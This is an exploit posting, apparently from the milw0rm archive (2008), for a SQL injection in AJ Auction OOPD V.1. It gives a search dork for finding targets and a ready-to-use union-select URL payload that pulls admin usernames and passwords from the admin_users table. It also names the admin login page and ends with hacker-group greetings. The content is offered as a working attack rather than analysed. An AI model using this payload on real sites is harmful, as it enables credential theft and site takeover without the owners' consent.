39 lines
No EOL
1.7 KiB
Text
39 lines
No EOL
1.7 KiB
Text
#########################################################
|
|
#
|
|
# AJ Auction OOPD V.1 SQL Injection Vulnerability
|
|
#========================================================
|
|
# Author: Hussin X =
|
|
# =
|
|
# Home : www.tryag.cc/cc =
|
|
# =
|
|
# email: darkangel_g85[at]Yahoo[DoT]com =
|
|
# hussin.x[at]hotmail[DoT]com =
|
|
# =
|
|
#=========================================================
|
|
# HomE script : http://www.ajauctionpro.com/ajhome.php
|
|
#
|
|
# Demo : http://www.ajauctionpro.com/auction_2008/v1/
|
|
#
|
|
# DorK : Powered By AJ Auction
|
|
#
|
|
##########################################################
|
|
|
|
Exploit:
|
|
|
|
http://localhost.com/[PaTs]/[PaTs]/?do=allcat&id=-1+union+select+concat(user_name,0x3a,password)+from+admin_users--
|
|
|
|
|
|
Admin login
|
|
|
|
admin/adminindex.php
|
|
|
|
################################################################################
|
|
#####################################( Greetz )#################################
|
|
# #
|
|
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA #
|
|
# mos_chori / Rafi / FAHD / Iraq Hackers / #
|
|
# #
|
|
#################################(and All IRAQIs)###############################
|
|
################################################################################
|
|
|
|
# milw0rm.com [2008-06-19] |